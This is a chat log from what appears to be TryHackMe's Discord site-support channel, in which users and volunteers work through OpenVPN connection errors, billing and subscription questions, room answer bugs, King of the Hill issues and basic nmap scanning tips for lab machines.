#site-support
1 messages · Page 76 of 1
Press enter.
yep i got it no idea why tf it was like that
-U demands a user, which agains refers to the original concept of priv esc, so anon login cant access smb share “sys..”
Yes but it's not necessary for the task.
If anon login in accessible, the user is supposed to access the share provided with anon privileges in which he could get left out admin hashes, user.txts, flags, or credentials to high privilege accounts.
he couldved done -L to list the smb shares and tried the ones he could access.
The share is profiles
yes, the directory profiles, it doesnt mean that smb shares are profiles. Thats different.
Ok. I was just trying to help them with finishing the task. They call it a share and it's named profiles. Did you manage to move on with the room? @rustic radish
yep
+rep
Gave +1 Rep to @timid talon (current: #40 - 195)
anyone?
You gotta change the DNS Type dropdown
@bronze vale
Hm?
tried to verify, it says "This token is already in use by another account."
Can you DM me the token, please?
needful is done
Hello i have won 8 king of the hill games and it shows 8 till 8pm but now it's showning only six.Is there any glitch or something else can i know ?
Hey I am New to AD Not Able to connect to it properly
I am albe to Ping the DC But Not Able to resolve the DNS Service on it
!help
if i cancel my subscribtion before period ends will i lose my premum?
Anyone from Support team ?
No. 🙂
Which network?
Breaching Active Directory
Following the pins in #breaching-ad
thx
Gave +1 Rep to @weary spindle (current: #1 - 2662)
Sorry guys but do you know why KoTH machine is freezing frequently and for long time?
Anybody know why I can't open up the browser?
Where can I go for more billing information? I keep having my card charged twice causing my card to be stopped by my bank.
You will need to contact support@tryhackme.com for payment related problems :)
Thanks, I did that too. I wanted to see if I could get a faster response here.
Gave +1 Rep to @bronze vale (current: #6 - 1310)
I'll gladly reply to myself. I solved the problem
Can someone help me I'm trying to create a room on THM nd whenever I try to upload a machine on it in ova format after 30 mins of processing it shows me a error saying cannot covert vm
Btw I am trying to upload a Metasploitable2 or If someone can suggest me something same vulnerable available on THM
I just need to take test of some basic methods
hi there, is there a way to reset progress for all the rooms i have finished or am currently in? like besides hitting each one and doing it manually 🙂
i would like to start fresh to learn for OSCP and would like to keep track properly
No, you need to do manually.
Or create a brand new account.
i was afraid of that answer 🙂
thank you ❤️
is the ninja skills room currently down? I can't ssh into IP and attack box also refuses to establish a connection
Have you tried to nmap?
Might have been a temporary networking issue, everything is fine now. Thanks
Gave +1 Rep to @weary spindle (current: #1 - 2663)
This is why it's not a great idea to use a phone, it's double.
But it will cause you nothing but pain, and people won't offer much support.
unfortunately it's all I have right now. And I typically don't ask for help too often
It's cool to see your dedication to hack on a phone
And the fact it works is even cooler
About KoTH, why some guys in 1minutes enter 5 flags, become king by entering their name, while i just started scanning ports😭
They even stoped service
Patched
How i can get experience...
Yeah, they remember how to get in and stuff, that's all.
Ironically doing KoTH
Hi All,
Just a reminder that support will be closed on Monday 26th August due to a holiday in UK
We will be back on the 27th 🙂
Anyone ?
@wind wedge 👋
Is metasploitable2 an appropriate ova you can add?
I don't even know what are you talking about.
I just started a day ago
Hey guys, I'm having trouble spinning up a machine in the room I'm in. I've tried from different computers. It's acmeitsupportx10-badr (savageni) if that matters. The server starts up but when I try to visit the site it tells me to it just hangs then says it can't find it. Not sure who I contact / etc- thanks
Can you post the room link?
Are you on the attackbox or a VM?
ttryhackme.com/r/room/authenticationbypass and I was just using my browser because the first thing it says is to visit the. ohhh i just got it, i have to use the attaackbox don't I. I thought it just wanted me to visit the webform
You need to either use the attackbox, or connect to the VPN, for this I suggest using a VM
thanks i've got kali spun up and I've used the attackbox (you can tell i'm new to tryhackme in general), but yeah the way it was phrased I thought it meant visit this page and try to login as admin. Like it has done previously so I just kept clicking the link.
Gave +1 Rep to @weary spindle (current: #1 - 2665)
No, that is what you've to do, but you can only do so with those two methos 🙂
Appreciate the help. I probably should have tried that. Good news is I found this forum.
anytime i do a full nmap scan it takes a really long time, i'm using the online attackbox. is it noticeably faster to use the vpn and attack my own machine? i don't really understand how to do that or what that means, i just see a second option.
I do not think you can get any faster than by using the AttackBox
When you say "full nmap scan", do you mean nmap -p- -A <IP>?
yeah namp -p- -A <IP> ,,, I'm just wondering if using the VPN option is faster, or does this full scan just actually take a long time.
*nmap
Having a virtual machine with high specs helps out a bit. You can use -T5 for the fast nmap scan. Though if it gets blocked it might revert back to a lower speed to be able to sort out ports efficiently.
I would not go with -A on an initial scan: I would leave that for a second or third nmap round
noted
ok. just run nmap -p- <ip> ?
the nmap -A uses basically minimal power to function, it is the -p- option, since with that option nmap will scan all ports from 1 to 65535 ports on the device.
yes for instance
What I usually do is:
# step 1
nmap <IP>
# step 2
nmap <IP> -sCV
# step 3
nmap <IP> -p-
# step 4 (not often) for ports of interest
Nmap <IP> -A -p <PORT>
Does the room require non-popular ports?
understood
I think the question is general, not room-specific
You can start using :
nmap -sC -sV -A -T4 -O —script=vuln {Machine_IP} > nmap.txt
the network services 2 enumerating NFS alludes to using nmap -A -p- <target IP>, additionally, the earlier rooms only really teach you to do this. similarly writeups and videos suggest this. So, it's confusing as a beginner if I should do this, also, how long does it take? You, know? As a noob its like uh.... is it broken?
Writeups are basically people trying to solve the room in fashion, which could be confusing at first especially if you’re new. And it might be frustrating looking at the nmap scan frozen while you wait for it to finish.
if the room demands you to use
nmap -A -p- {MACHINE_IP}
then you can use this :
nmap -A -p- -T4 -vv [MACHINE_IP]
- A basically “Aggressive” Mode
-p- scans all ports on the device
-T4 is speed 4 you can use T1,T2,T3,T4,T5…
-vv is for very verbose, in other words it debugs the nmap scan meaning you can see the errors, time it takes to finish, loading status…
noted. much appreciated 🙂
no worries.
In that example, -sC -sV -O are a bit redundant if you also do -A
Reason: the Aggressive (-A) scan enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
Yes in that example my bad, i corrected it above, but usually any nmap argument is not as redundant if pertained on 1000 ports rather than 65535.
@weary spindle 🍿🚓
Done!
that guy is hacking ? impossible to get top 1 in my country
2644 events 1 day its impossible no ?
Cc @bronze vale
https://tryhackme.com/r/room/windowsfundamentals1xbx can someone help me connect to this rdp? i might be having trouble with the certificate part. when i connect it tries to log in but always says denied
#room-help Would probably be the better channel also verifying your account so you can send screenshots of the issue is a good idea
ok ty
Who do i speak to about updating my discord token? as I have already verified but need to change the token.
What does that mean sorry
hello people when i download task files from the room block it doesnt extract lsadumpfile just traffic capture file coming out
Hey. I came across this sentence.
"Of course not only can Javascript be embedded, by executables can be very much too." Is this written well?
Because I think it reads kinda weird... So, it might be me. idk
I thought it would be "Of course not only can Javascript be embedded, but executables can be very much too."
This is the **MAL: REMnux - The Redux **room
Specifically in the Task-3, Executables sub-part.
You may ask a Mod politely to do it for you when you chance upon them.
How are you downloading it?
Suggest to post this in #room-bugs
What app are you using to connect? What OS are you using?
I click the download and download
2024-08-23 05:03:09 DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305). OpenVPN ignores --cipher for cipher negotiations.
2024-08-23 05:03:09 Note: Kernel support for ovpn-dco missing, disabling data channel offload.
2024-08-23 05:03:09 OpenVPN 2.6.12 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2024-08-23 05:03:09 library versions: OpenSSL 3.2.2 4 Jun 2024, LZO 2.10
2024-08-23 05:03:09 DCO version: N/A
2024-08-23 05:03:09 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.168.160:1194
2024-08-23 05:03:09 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-08-23 05:03:09 UDPv4 link local: (not bound)
2024-08-23 05:03:09 UDPv4 link remote: [AF_INET]18.202.168.160:1194
how to fix this issue witht openvpn can someone guide
https://www.tryhackme.com/r/access
Go to Eu Reg 3, > Regenerate > wait > download
Hi, there is possibly a bug in Snort Challenge - The Basics - TASK 2
whats wrong?
system keeps rejecting correct answer, I have confirmed the answer multiple times from past writeups, some other users are reporting it in #room-help as well.
Which answer are you trying?
both of these, i have not tested the next one
You might have copied the symbols with the answer you’re trying to paste, which tryhackme doesnt recognize. Try manually typing it.
wait.
@junior tapir did you spam it?
also when you’re pasting add a space at the end then delete it.
@junior tapir the answer is wrong, check the asterisks.
there is not a single IP with two-digit octet in the pcap. not sure what could be the issue. By the asterisks, it should be xx (two digits) at the end
Which room is this?
Snort challenge - The basics
I thinks theres an issue or an outdated output.
@junior tapir try reporting this issue.
Thank you @autumn spear - seems reporting the room leads me to Discord (here). Any dedicated email i should use?
Gave +1 Rep to @autumn spear (current: #599 - 7)
Have you seen this in the Pinned Messages for #room-help ?
#room-help message
thank you, checking...
https://tryhackme.com/r/room/bypassinguac
I'm having some problems with the target machine in this room. After booting, the target machine will automatically shut down after a period of time. I tried restarting the machine many times, there were a few of them where the Target would automatically shut down right after starting
How long is a period of time?
about a few minutes
ah, ok!
enough time for me to get my first flag = =
hi there,
Cloud VM Attack machines are very slow when working on them with burp and other tools. I'm a subscribed user.
How long do they typically take to respond to emails/requests?
3-4 days, but it's a holiday weekend so after today they're not back until Tuesday.
okay thanks
Gave +1 Rep to @weary spindle (current: #1 - 2670)
||E5||
The answer needs updated.
okay thanks
Read up two messages...
Hey guys, I'm new to THM and I'm having a weird variant of a well-known issue with OpenVPN connection. Ran it as admin -> the VPN con succeeded -> I got an IP assigned -> I double checked with 10.10.10.10, got flag{connection_verified} and it displayed the correct IP (the same one as in OVPN logs). Access page doesn't show any IP and says I'm not connected + Access Machines button is red (but these are supposedly broken). Some of the machines work for me, some of them don't (Summit and OpenVPN rooms so far). The way they don't work is they start and I can terminate them but they never open a VM window (I can access them through their IP in my own browser though so it's not that big of a deal as long as I don't misclick files). Any knowers what might be the issue (is it just Win10)?
That's intentional. Please read this doc. 🙂
Oh alright, still too attached to GUIs and the same button design managed to trick me. Thanks a lot!
hey where can i see my certifications after finishing a path
You can download them.
I just saw @weary spindle' response to you. Did you click on the message?
he told me to ask in here
didnt see another message
can i just have the answer please so i can move on xD
oh im an idiot
i see it now
thanks
I believe that has been fixed for some time now.
Ive done that pyramid over 20 times an almost smashed my mouse.
Anybody know the answer to the flag question?
Haven't done the room yet unfortunately so you'll have to wait for others to chime in.
thx
It's not broken
Guys, i have an issue at room Network Security, it tells me to connect to ftp server, but when i run nmap MACHINE_IP, there is no ftp port on, what can i do?
Are you doing MACINE_IP, or 10.10.xxx.xxx ?
I was doing machine ip haha, my bad, i solved it
Yeah, I see.
Please don't multipost 🙏
hı ı need help for pay to premıum. ı have a problem. ı cant pay to premıum .my card is always declined why?
Maybe, international/internet transactions aren't allowed (enabled) on it?
no , ı check ıt, ıt is open
ı contact my bank and ı take this answer "no problem you can pay ,we dont know"
Is the card getting declined from the source or the destination? Is there enough balance? Does the card accept international transactions? Are you spam buying the service?
You will need to contact support@tryhackme.com
I can't make a ticket, the support part keeps loading.
I need to request a streak reset to "255" days.
Are you following that procedure above: it was updated one week ago, so I guess it is current
I must say I have never created a ticket myself though
I guess it makes sense to keep screenshots of everything, including creating that ticket
You can email support@tryhackme.com
Yes, but it shouldn't be loading infinitely.
Will try that.
i have a question
in this game my opponent with 100 points is king
but his points not increasing at a certain time
i mean he only got 1 point as a king
why ?
is he doing something wrong ?
What means the error"Oh no,an error occured while starting VM:PARSING_ERROR"
Whatever it was looks like leaving the room moving to another and coming back worked
Ctrl adn F5.
and*
who is there
sup
perhaps. whats the issue?
am using vm and i cant connect to open vpn
alright. how are your trying to connect?
might be easier if you verify (see link) and share screenshots.
@mild vine
am trying to connect with the way on the site !
Hard to tell where its going wrong if I dont know exactly what you are trying.
can i share a screen with u
in voice channel
you can share it in here.
voice would be easier than taking screen shots
which VPN server are you using?
Try to regenerate the config file. wait 3 minutes before you download it.
which openvpn version you have installed?
Well give this a try tho. Usually that works when the cipher not set error shows up.
how do i remove a payment method from my account
You'll need to contact support.
nth work bro
same error?
@timid talon
That's working.
can you acces http://10.10.10.10 in the browser and does it show IP? or in another terminal tab can you curl 10.10.10.10/whoami ?
Remember and minimize it, not close it.
so its working
You are connecting from kali VM? nothing personal on there just default kali setup?
Nobody is interested 😅
Uh...
People can still interact with our tun0
can u remove the messeges
@weary spindle
People here sharing their tun0 IPs all the time right? Is there any real danger?
Depends.
If you don't run stupid services with default credentials your fine.
Has other people tried to mess with other people on the network? Yes.
There is a small % of chances of it happen, THM monitor the network so they know when people are scanning what
I share my tun0, I'm not paranoid, I know nobody is going to be able to hack the VM, but if they do, they won't get much.
And even if they manage to break your VM, you can just reinstall, right?
I'd roll back a snapshot.
But yeah, VM break outs are not easy
This is why whenever somebody tries to connect with their host, I advise against it.
Hello!
I am having problem to connect to the TryHackMe machines through OpenVPN. Could you please help me out?
I am having same problem as this:
https://www.reddit.com/r/tryhackme/comments/14m1taj/unable_to_connect_to_tryhackmes_network_using/
Which server, OS country?
I am from Nepal. From Nepal, Indian server is the closest as I know. But people were telling the Indian server doesn't work. In my case too the Indian server didn't work. Then I tried other servers, but they didn't work too.
For your instance, I am assigned a new IP while connecting to the openvpn. But the ACCESS page of the TryHackMe is showing NOT CONNECTED status all the time
The Access page is broken.
Oh okay. Then how should I connect then?
Ignoring the access page, if you get a connection initilazed you're connected, you can confirm with ip a | grep "tun" or visit http://10.10.10.10 or curl 10.10.10.10/whoami
@timid talon delete this messege
htttp://10.10.10.10 gives CONNECTION_VERIFIED result, but when I enter http://<my_new_ip>:81 , It says "This site can't be reached".
Why is this happening?
And how to get access to a machine?
Which room are you doing?
You don't want to access the tun0 as it's your address, not the target machine
I was reading this:
https://tryhackme.com/r/room/owasptop102021
Oh I got it now
We need to start the machine first using the green START MACHINE button and then it gives the machine's IP with which we could access the machines
Thank you so much for helping me out
From the site or this discord?
Is there anyway I can open a ticket?
You can use the bot on the site or email support@tryhackme.com
I'm not trying to utilize email, I don't want to wait that long, not going to lie. i am having an issue with openvpn. I connect to it, and go to 10.10.10.10, and it say's that I am connected. However, when I go to tryhackme.com and start a machine, I cannot access it via openvpn. And on the tryhackme openvpn access page it says not connected. I have regenerated, and downloaded new configuration files but it still will not work.
The acces page can be ignored as it's broken. When browsing to 10.10.10.10 do you see an IP on the page? Or else try curl 10.10.10.10/whoami in terminal.
I do see the IP on the page.
Which server you using?
When you regenerate the config file, wait 3 minutes before you download it. Then try again.
from the site,my username zsecode
Drop an email to support@tryhackme.com
VM is highly recommended so it should not be a problem.
Okay.
Make sure you only use 1 VPN tho, the thm openvpn.
Of course.
not continue & response from staff
When did you drop an email?
7 Mar 2024, 00.19
I'm using internal eth0 for the wlan on my dedicated machine, which is ARM architecture. I am using an external HDD for my linux OS. @timid talon
That can’t be correct.
Drop another email and we may be able to get back to you Tuesday
I still can't access the machines. It keep's telling me i need to be connected to OPENVPN. if you can see this page, you're connected to TryHackMe
flag{connection_verified}
Your VPN/TryHackMe IP is: 10.2.2.217
As you can see, I am connected to openvpn
You’re connected, what machine are you trying to do?
done,please check
I recently stopped subscription.now I can't resume subscription.. I clicked on subscription button, and on manage account -> subscription it show cancel subscription after I pressed the resume button. but when I go to dash board back it again show resume subscription
It will most likely be seen tuesday as we don’t work weekends and tomorrow is a holiday in the UK
I'm glad I have a .edu email 💀
oke dont worry , i will wait it
Grustopher did mention that 🙂
I must have skimmed it! Sorry @timid talon That's my bad.
I am connected to THM using my Kali VM and the VPN,and the funny thing is that when I browse to 10.10.10.10. it says that I am connected to THM, but it does not display my IP; also the page keeps loading All the rest works as expected (ping/curl/nmap to 10.10.10.10. are OK)
And if I browse to 10.10.10.10 using the (Kali) attack box, then I have the IP displayed as expected
To be clear: I am not flagging an issue here, as I know I am connected
I was wondering whether you have experienced similar situation
No, just my Kali VM conntected to the VPN
Im connected to cloudflare's DNS WARP, but I had to disconnect it, and reconnect the opevpn, and after it was connected, I reconnected WARP.
Okay.
No such thing with me
Disconnect from openVPN, disconnect your vm's eth0 or wlan0, recconect it, and then reconnect to openvpn and see if that works.
I've seen it before when I did not 'correctly' closed down openvpn (just closed the terminal instead of ctrl+c first) and then reconnected a bit later again.
Thanks for your feedback
I am the culprit: I had my ProtonVPN running before starting my THM open VPN connection, effectively stacking 2 VPN on top of each other As soon as I disconnected my ProtonVPN, without touching my THM openVPN, the web page to 10.10.10.10 finished loading and displayed my IP
Thanks for sharing
Gave +1 Rep to @timid talon (current: #40 - 202)
Thanks for your feedback Here is the end result of my problem:
#site-support message
Happy hacking
No problem @upbeat quarry ! Even though you got the rep, lol. Im glad we came to this solution and it fixed the issue!
guys right now i am stuck in Encryption - Crypto 101
in this question : Who is TryHackMe's HTTPS certificate issued by?
and the answer is not ca or c3 or e3 or us or ie any one can help?
cloudflare
issued by
Baltimore CyberTrust Root
@cedar wasp I sent you the .pem certificate file in your DM's.
Okay we need help 

We solved it 
hello, i am a noob in this world so i need some help i downloaded open VPN file and connected to vpn but my website dosen't show that i am connected, even after regenerating the vpn file issue is still the same, ig a bug in the site.
The THM acces page can be ignored. The connected/not connected isn't always working properly.
Try to curl 10.10.10.10/whoami in your terminal
Oh I see you did thay
Looks good
i did it just see the image please. so everything should be fine right
okay
thanks
Hello, is there anyone from staff who can help me? I paid my premium, the charge was made correctly and it keeps asking me for premium to access my content, or rather I don't have premium even though I already paid for it an hour ago.
You'll need to contact support, account and payment are not dealt with over Discord. (They're closed today)
I sent it a few hours ago and now I'm just waiting... I hope they compensate me but I'll talk to them about it.
hı ı cant pay to premıum , ı enter my card detaıls and clıck to buy after ı take answer "card ıs declıned contact your bank" . ı contact bank and ı take answer ıs "no problem you can buy " . ı cant understand what am ı happend?
Your subscription will not start until it is activated.
You could still try checking with THM Support, but if payment isn't coming through, chances are, its with your bank (potentially flag it as a suspicious transaction). Did you try making the payment while talking to your bank's support (or at least show them the error you are having)?
yes ı show them error but they cant help me. staff say "ı cant do anything " ı try checkıng thm support but ı dont take feedback
I think it is a holiday in the UK so you'll have to wait until tomorrow.
It is.
ıs thıs reason ?
No, which country do you live in?
in turkey
Unable to download wreath network config file ,
Upon downloading greeted with unknown error occurred msg
I cant connect to the vpn. my debian system and my windows 11 vm give the same error.
2024-08-26 13:01:20 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2024-08-26 13:01:20 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2024-08-26 13:01:20 Note: '--allow-compression' is not set to 'no', disabling data channel offload.
2024-08-26 13:01:20 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2024-08-26 13:01:20 library versions: OpenSSL 3.0.13 30 Jan 2024, LZO 2.10
2024-08-26 13:01:20 DCO version: N/A
2024-08-26 13:01:20 OpenSSL: error:0480006C:PEM routines::no start line
2024-08-26 13:01:20 OpenSSL: error:0A080009:SSL routines::PEM lib
2024-08-26 13:01:20 Cannot load inline certificate file
2024-08-26 13:01:20 Exiting due to fatal error
Are you using sudo?
Which server?
no but im root.
europe regulair one and us regulair one
Why do people run everything in root
Also try switching to servers from other continents, that worked for me
EU 3 would work perfect
who says i run everything in root. I know what im doing in root just have a root console open. I tryed to run sudo and sudo -e for edit for some time. but sometimes the user does not has file access so you cant use tab compleat and other stuff.
linux is freedom Im free to use root how i please on my own system.
Im not insuted.
Alright nice, back to your question
3 works
Yeah. but i hate your QA department. gave up sending feedback because they said it wasnt a problem. so many rooms with info that is diffrent on the web now..
Btw if you got more questions, I could help you in dutch if you want
What do you mean?
Do you have any example?
No because it where to many no feed back at the 1st once. so i dont be bothered.
Whut
Eh?
well IM QA. and the 1st issues i found where questions could have multiple answers and i dont get a positive replies At all I dont give a damn at one point. Not my monkeys not my circus.
In the netherlands we say: vaag verhaal ||vague story||
YEah like that.
xD
Can you DM me what you encountered?
You can DM me in Dutch
As I don't really get what you are saying
IM QA. i found issues. reported them. dont like the feedback so i dont report the issues anymore.
like i said. I dont be bothered anymore so i forget them. after i found the awnser in a wireup.
like information about a issue that is not shown anymore due to a gui update of the remote site.
I have a question about streaks, i want to get started with Active Directory rooms but some rooms requires 7 day streak
If i subscribe do i still need to do 7 day streak ?
No. 🙂
Okay thank you so much for quick answer !
Gave +1 Rep to @weary spindle (current: #1 - 2682)
Hello, am currently facing an issue with lateral movement and pivoting (Active Directory) room where the network/room button is not starting ( failed to start the Network)
any suggstions?
Leave the room with options and re-try in 15 mins
thanks, 7h4t w0rk3d!
It looks correct, what are you expecting?
i was expecting to get a bunch of command lines to use
what do i put in the run command
There are 3 commands there, .RUN <command> looks interesting
Oh, any command I guess
BTW, #room-help
Is there any channel on the tryhackme site where I can ask questions about ctf development?
yes
➕ Gave the role Creators-Lounge to mrahmi
There you go.
thanks
hi everyone i have a problem connecting openvpn to the machine
Which server and OS?
kali / eu-vip1
Which country are you in?
I'm on VIP 1 now.
egypt
Yup
Egypt blocks VPN's.
We can't help.
Sorry, you're only alternative is to use the Attackbox.
my friend has just done it with the same instructure
If they're in Egypt, I doubt it
okay thank u
Hi all,
I am at pre-security at windows fundamentals, and trying to RDP but I cannot for some reason. It says "The remote desktop server has closed the connection because it conflicts with another connection. Please try again later."
Disconnected and tried to reconnect already. Does not seem to work either.
Could you please help me?
What application are you using to RDP, and where are you starting that application.?
BTW, for this room, RDP is optional: you can do all the tasks by direcly accessing the Windows target that opens on the right in a Split View mode
Ohh, yea sorry my bad... So, basically those credentials are to access that VM, which is in split view, from my own network right?
Sometimes just following the conent without actually thinking logically hehe
Thank you anyways
Correct
Have fun
After taking a long hiatus (walk the earth and ride freight trains type hiatus)
I'm back. Unfortunately I do not remember my password and the academic email address its under I no longer have access to.
Can anything be done? I was one of the first thousand users and would hate to lose the account and progress
Is it usual to get a connection from an external IP when listening on a THM Attack Box instance? Is there a way to report this type of activity?
wdym “external ip”? The machines are connected to a private network.
I saw what appeared to be an external IP, not part of the private IP addresses. I checked on Cisco Talos and the IP reputation came back as Poor. I should've taken a screen grab as the Attack Box is gone now. There was a connection with "user-agent zgrab" in the text. I thought it was worth asking the question. I have the IP, but wanted to know where to direct any additional info, or if this was something support were interested in.
did you lookup info on that ip?
I looked on Cisco Talos. I've since done a whois lookup after your message. There's a class C subnet showing against the lookup; there were 65 IPs showing as poor with email reputation on the /24 subnet in Talos.
About that issue, I found this message interesting (and the few ones before):
#general message
Okay, that seems to answer my question. Expected behaviour. Thanks.
Gave +1 Rep to @upbeat quarry (current: #151 - 49)
hı ı cant pay to premıum , ı enter my card detaıls and clıck to buy after ı take answer "card ıs declıned contact your bank" . ı contact bank and ı take answer ıs "no problem you can buy " . ı cant understand what am ı happend?
Hello guys, I am new on tryhackme so I am enrolled in a Room but have a problem. As soon as I click on resume or on alternative way on the room, the new page does not load. I am waiting for about 5mins and even tried to reload the page (for few milliseconds I can see the website like usual but after that the only thing I see is a blank screen). I’d be happy if soomebody could help me out
I do not understand what you mean when you say you "click on resume or an alternative way": can you give more details
Also, please provide a link to to the room you have the problem with
Unfortunately, I can’t send a screenshot but on my mobile phone it works normal but if I click on the room the page does not show up as it does on my mobile phone
You can send screenshots after you verify with Discord Also, please provide link to the room
is there an alternative network available if 10.10.0.0 is claimed by my work network.
for a vpn connection?
I don't think there's a way around it, but you can use the Attackbox
im a hacker there must be a way.
hack your way in
able to run openvpn on wsl got it running.
Oh yeah, you could run it in a VM.
how can i quit attackbox screen i did a poweroff but now i have a dangling screen. in the room i only have control of the pratice machine
WSL doesn't have good support with networking, others have pointed out issues with it
not if you use systemd
I dunno, just informing you
works like a charm only docker needs a patch every update due to a 2 year old bug
There should be some action buttons at the bottom to close the Attackbox split window. Or maybe a refresh would do
oke a terminate machine button. works
Im going to setup a nat vm i guess
Yeah a VM using NAT
I dunno why but I can't download the wreath config file it just says unknown error occured and regening also dosen't work 
Issue resolved just had to leave the room and wait a bit
Hello Guys, i am having a problem connecting to (TryHackMe server) via openvpn in a Kali linux VM,
I have sent a ticket regarding the issue almost a week ago and still waiting for the response from the team. Should I wait them OR can somebody in this room help me instead?
Which server are you trying and which country?
EU - 1, there is no option for me to select the country as far as i know
@weary spindle
i also tried other EU servers
I meant which country do you live in.
Try eu-reg-3, but regen it first
i did what u said and this is what i got after i ran the command :
https://i.imgur.com/daiQv6q.png
@weary spindle
Please cna you verify if you wish to share screenshots with me.
verification successful
Now you can post embeds.
i did what u said and this is what i got after i ran the command :
https://i.imgur.com/daiQv6q.png
@weary spindle
Put the vpn in " " it doesn't like the brackets.
Options error: In [CMD-LINE]:1: Error opening configuration file: /Downloads/Suhaib98.ovpn
Note: I just renamed the file so that it does not have brackets
@weary spindle
Can you share the error log?
sure , one sec
$ sudo openvpn "~/Downloads/Suhaib98.ovpn"
Options error: In [CMD-LINE]:1: Error opening configuration file: ~/Downloads/Suhaib98.ovpn
Use --help for more information.
@vague raft
Try to cd into downloads and then open it via no path just file name the error is becouse of the ~ and the " which couses ~ not to expand to the home directory
@red wyvern
ok will do
You get an error like this when your try to do openvpn on a file that is not there: in my screenshot, my vpn file is thm.ovpn but instead I point at blabla.ovpn resulting in the error you also have
i got this now @vague raft
Try servers from other continents now
You're now conected
thank god woooosh
You're welcome
one more thing: how will I now connect to the "attackbox" to solve the objectives given to me? @vague raft
Well you don't?
The attackbox is an alternative to openvpn
aha so now i am connected to the "attackbox"?
No the attackbox is seperate
You use your own device as the "attackbox"
the vm right?
Yup
So at the start of your thm session you run the openvpn file and then you can basically connect to whatever room you want
aha got it bro, u saved me a lot, god bless u
You're welcome
hi idk if this is the right channel but why Is there no dark mode for the site
apparently its in the making.
youre the goat that helped me not too long ago
mmm looking forward to no burnning my eyes
Gave 1 Rep to mats.m (current: #40 - 204)
I talked to a marketing head the other day and mentioned that the blogs page alerts AV program
For THM?
this is the shown alert
yes
Staffwill handle it then 🙂
It could be a false positive.
whenever I go to support>resources
I forgot to mention, the Active recon room has been fixed. 🙂
Ye just wanted to provide it here just for further information
The answer was updated now,
Thanks boss
Gave +1 Rep to @weary spindle (current: #1 - 2692)
These keyword definitions make it quite difficult to read some of the text in all the rooms I have come across with glossary definitions in
for some reason, my openvpn wont connect, i cant do it through my wsl nor through the gui app on windows 11, any support able to help?
is there any logs?
i can send you a screenshot if youd like
Openvpn won’t connect, tls error
which openvpn server on tryhackme??
have you tried multiple???
have you tried regenerating the config???
can you post a screenshot of the output???
tried LL
Iall
i tried regenerating
does your vm/computer have internet access???
yeah
egypt rn for holiday
yeah that would be why then
doesnt work in egypt?
egypt is known to block the standard openvpn ports and tryhackme does not offer alternatives
the attackbox should still work if quite a bit less convient
alr thanks
Quick question does anyone know how to hook the open vpn up with kali on vmware
every time I try to run sudo openvpn vpn file it stops at protocol options: explicit-exit-notify 3
Does it say connectsd 4 lines above?
Yo support team, anybody there?
I'm starting the AttackBox from the "Breaching Active Directory" module, but there is still no "breachad" interface created. I had no problems with the lateral movement and pivoting module, but for some reason I'm missing the interface here.
Two options:
- Leaving and rejoining the room. Of course terminate the attackbox meanwhile.
- Running the VPN in the Attackbox.
It’s a known issue that’s being looked into
@wind wedge can you guys extend my three days access, if I didn't use it?
Hay, I've pinged you in #breaching-ad and addressed this, (so we don't waste blackouts time)
Yeah, I just read that. It'll be nice and easy to do it via attackbox. I currently don't have the tool setup in my host.
Are you able to download the VPN on your host?
Yes.
Is it blank?
Nope.
Can you DM it to me, I can host it and you can download it on your attackbox?
I already thought about that, the problem is I'll have to do it everytime I shut the attackbox.
Anyways, I'll just login to thm in attackbox. 🙂
I would not suggest that.
Thanks @weary spindle I came up with another idea 🙂
Gave +1 Rep to @weary spindle (current: #1 - 2693)
What was it? 👀
Done!
i'm unable to connect my openvpn to try hack me even after connection the site says not connected please help me
Ignore the site
im unable to ping the room
What box are you working on? Can you provide the link? Windows boxes generally do not respond to ping requests due to Windows firewall.
ohSINT and im trying it on my linux but it shows your'e disconnected
Red Team Capstone Challenge, got problem with ip 10.200.117.101 BANKDC
someone just turned it off or shutted down
so can't do lateral movement and furhter steps
For that room there isn't a VM attached?
Can someone help with me setting up my DNS for one of the AD network rooms please?
Im using own linux machine with OpenVPN.
I've tried following steps in room intro by adding IP for DC in 'Additional DNS servers' box of the Advanced Network Configuration setting for my wired connection but it doesn't work
Here is a screenshot with the steps I have followed and seem to work
I have also added a screenshot of the THM network I have been using so you can see the IP addresses relevant to me (you probably will have different IP addresses for your own network instance)
I have not done that room beyond Task 1 though
In case you have more issues, please provide screenshots (you may have to verify first with the /verify Discord command in order to upload files)
nevermind, its worked
thanks
bro when polish language on your site
as far as shadow has heard there is no plans for localisation on tryhackme
yo yo, ive noticed discord token on THM web and figured its for connecting web with discord profile.. how can do it please?
ok when mobile app
@steep prism
¯_(ツ)_/¯
thx a lot!
Gave +1 Rep to @west chasm (current: #107 - 65)
i don't know why but when i try to join a public game in koth it redorects me to 404 nof found and same happen with my friend too
Yea it worked, Thanks Blackout.
Gave +1 Rep to @wind wedge (current: #52 - 149)
I am having issues as I can't ping the THMDC from Attackbox and VPN
ping 10.200.32.101
I left the room multiple times and joined to join different subnets but still same issue presists despite following the pinned post
Do you use THM AttackBox?
hey there's a question bug into linux foundamentals part 1 room. The answer is correct of course but it's considered as wrong. What should we do in this case?
It is a bug indeed:
#room-bugs message
grazie(:
There is a fix created, just needs to be implemented.
Yes, and I've done all steps mentioned in the room pinned post
Hi everyone, https://tryhackme.com/r/room/burpsuiteintruder
Task #7 answer box is bugged, am entering the correct answer but still gives me "Uh-oh! Your answer is incorrect" error.
the correct answer or the answer am entering is "username=admin&password=admin".
i wish i get some help, i thinks it a bug.
known issue.... seems the symbol & and some others are failing to work in the answer input field
Cannot ping any ip in the network, despite
- Starting the Attackbox in the Breaching Active Directory room
- Left the room and joined multiple times to get different subnets but kept getting the same error from every new subnet
